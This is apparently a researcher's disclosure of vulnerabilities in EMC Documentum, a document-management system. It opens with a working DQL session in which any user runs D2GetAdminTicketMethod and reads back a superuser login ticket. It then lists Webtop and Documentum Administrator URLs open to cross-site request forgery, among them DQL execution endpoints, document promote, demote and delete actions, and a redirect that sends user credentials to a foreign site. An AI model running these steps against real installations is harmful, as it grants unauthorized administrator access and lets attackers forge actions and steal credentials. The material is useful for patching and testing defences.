documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

Any user is able to execute D2GetAdminTicketMethod to get superuser’s ticket:

1> create c6_method_return object set message='test'
2> go
object_created
--------------
00002ee280000e9b
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
message
--------------
DM_TICKET=T0.....
(1 row affected)

documentum security vulnerabilities: multiple XSRFs in WDK applications

Cross-site request forgery attack is completely described in WikiPedia, below is a list of URLs (or components) in WDK applications (like Webtop, TaskSpace, EPFM, Documentum Administrator) vulnerable to XSRF:

DQL execution

  • /webtop/component/dqleditor?query=<query>
  • /webtop/component/appintxdql?query=<query>
  • /webtop/component/search?queryType=dql&query=<query>
  • /da/component/auditlist?query=<query>
  • /webtop/component/historicalactivityreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/processdetailreportresults?process_id=0000000000000000&query=<query>
  • /webtop/component/historicalprocessreportresults?query=<query>
  • /webtop/component/historicaluserreportresults?query=<query>
  • /webtop/action/view?objectId=<objectId of dm_query object> (executes /webtop/component/search?queryType=dql&query=<query>)
  • /webtop/action/search?queryType=dql&query=<query> (executes /webtop/component/search?queryType=dql&query=<query>)

other

  • /webtop/component/virtuallinkconnect?redirectUrl=http://url&virtualLinkPath=/webtop/component/main (sends user credentials to foreign site, found in 6.7SP2)
  • /da/component/scsaveas?objectId=<objectId> (creates copy of objects, potentially can be used to apply less restrictive ACL to copy)
  • /webtop/action/deletenotification?type=dm_notification&routerId=0000000000000000&objectId=<objectId> (deletes dmi_queue_item object)
  • /webtop/action/demote?objectId=<objectId> (demotes document)
  • /webtop/action/promote?objectId=<objectId> (promotes document)

components could be launched either directly (as in examples above) or through container:

  • /webtop/component/dialogcontainer?component=search&queryType=dql&query=<query>&componentArgs=

or through appintgcontrollerlogin component:

  • /webtop/component/appintgcontrollerlogin?dispatchitem=search&dispatchtype=component&queryType=dql&query=<query>

actions could be launched through ActionDispatcherServlet (as in examples above) or through actiondispatcher component:

  • /webtop/component/actiondispatcher?action=search&queryType=dql&query=<query>

or through any component:

  • /webtop/component/main?startupAction=search&queryType=dql&query=<query>